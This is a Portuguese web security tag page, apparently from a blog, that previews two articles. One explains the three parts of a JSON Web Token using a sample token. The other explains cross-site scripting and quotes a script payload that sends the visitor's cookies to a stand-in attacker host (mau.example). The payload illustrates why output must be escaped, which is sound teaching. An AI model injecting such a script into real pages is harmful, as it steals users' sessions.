FNSP Web Page

Tag

Segurança

Injeção, XSS, CSRF, passwords e segredos: o que corre mal, e o que evita cada um.

JWT: o que é, e sobretudo o que não é

O JSON Web Token é três blocos de texto separados por pontos. Vale a pena saber exatamente o que cada um faz, porque quase todos os erros com JWT vêm de lhe atribuir propriedades que ele não tem. eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiIxMjMiLCJub21lIjoiQW5hIn0.4pcPyMD09olPSyXnrXCjTw └── cabeçalho ──────┘ └─…

Ler o artigo

XSS: escapar à saída, não à entrada

Um comentário com isto lá dentro: <script>fetch('https://mau.example?c=' + document.cookie)</script> Se a página o mostrar como HTML, o script corre no browser de quem visita , com a sessão de quem visita. É o cross-site scripting , e continua a ser a vulnerabilidade mais comum na web. 1. Os três sa…

Ler o artigo

Gostávamos de saber quantas pessoas visitam o site, com o Google Analytics. Sem a sua autorização não corre nada. Política de Privacidade.